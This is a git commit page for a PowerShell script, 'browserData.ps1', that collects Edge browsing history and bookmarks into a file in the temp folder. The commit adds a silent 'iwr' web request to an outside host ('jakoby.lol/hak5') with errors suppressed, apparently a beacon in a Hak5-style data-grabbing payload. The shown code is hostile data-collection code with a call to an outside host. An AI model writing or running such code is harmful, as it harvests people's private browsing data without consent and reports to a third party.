Update browserData.ps1
This commit is contained in:
parent
2575e78c54
commit
29cb80fb06
1 changed files with 1 additions and 1 deletions
|
@ -31,7 +31,7 @@ function Get-BrowserData {
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
||||
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt
|
||||
|
||||
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt
|
||||
|
|
Loading…
Reference in a new issue